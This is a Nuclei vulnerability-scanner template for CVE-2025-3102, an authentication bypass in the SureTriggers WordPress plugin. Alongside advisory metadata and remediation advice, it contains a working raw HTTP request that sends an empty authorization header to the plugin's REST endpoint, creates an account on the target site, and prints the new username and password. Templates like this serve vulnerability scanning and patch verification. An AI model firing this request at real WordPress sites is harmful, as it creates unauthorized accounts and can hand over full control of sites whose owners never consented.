id: CVE-2025-3102

info:
  name: SureTriggers – All-in-One Automation Platform ≤ 1.0.78 - Authentication Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    The SureTriggers – All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.
  impact: |
    Unauthenticated attackers can create administrator accounts when the SureTriggers plugin is installed but not configured with an API key, gaining complete control over the WordPress site.
  remediation: |
    Upgrade to SureTriggers version 1.0.79 or later, which properly validates the secret_key parameter.
  reference:
    - https://plugins.trac.wordpress.org/browser/suretriggers/trunk/src/Controllers/RestController.php#L59
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve
    - https://github.com/Nxploited/CVE-2025-3102
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-3102
    cwe-id: CWE-697
    epss-score: 0.83531
    epss-percentile: 0.99298
  metadata:
    verified: true
    max-request: 1
    public-query: "/wp-content/plugins/suretriggers"
  tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        st_authorization:

        {"integration": "WordPress", "type_event": "create_user_if_not_exists", "selected_options": {"user_email": "{{email}}", "user_name": "{{username}}", "password": "{{password}}"}, "fields": [], "context": {}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"user_registered":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + " Password: " + password'
# digest: 4b0a00483046022100f2f4a2d7a2bb77ea77789fa455c7ae2748be9a657854bbac2b908c1298520f44022100c4d636a1a7159cff1dedffd450c9c3935bc90cb9a96715d4c257d327e6b64acb:922c64590222798bb761d5b6d8e72950